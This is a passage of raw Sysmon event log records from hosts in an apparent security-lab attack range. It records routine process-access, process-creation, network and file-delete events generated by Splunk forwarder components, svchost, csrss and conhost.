EM32\ntdll.dll+51791 10341000x800000000000000040011Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:33.929{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040010Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:33.929{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040009Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:33.929{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040008Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:33.929{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E35D-63C7-0706-00000000AF02}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000040007Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:33.929{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E35D-63C7-0706-00000000AF02}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000040006Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:33.930{FE4C2B44-E35D-63C7-0706-00000000AF02}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000040005Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:33.670{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C546ED0DF2BF8AD572EEF4255719465B,SHA256=834DDE16726E7720245C66F99AD3A4DC6E4CE3607B645C10D635902CE5C07A21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000015293Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:33.216{E5A8D418-E35D-63C7-E501-00000000B002}2923240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015292Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:33.044{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E35D-63C7-E501-00000000B002}292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015291Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:33.044{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015290Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:33.044{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015289Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:33.044{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015288Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:33.044{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015287Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:33.044{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015286Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:33.044{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015285Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:33.044{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015284Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:33.044{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015283Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:33.044{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E35D-63C7-E501-00000000B002}292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000015282Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:33.044{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015281Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:33.044{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E35D-63C7-E501-00000000B002}292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000015280Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:33.045{E5A8D418-E35D-63C7-E501-00000000B002}292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000040004Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:33.320{FE4C2B44-E35D-63C7-0606-00000000AF02}57806972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000040003Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:30.573{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56231-false10.0.1.12-8000- 10341000x800000000000000040002Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:33.151{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E35D-63C7-0606-00000000AF02}5780C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040001Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:33.151{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040000Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:33.151{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039999Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:33.151{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039998Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:33.151{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\W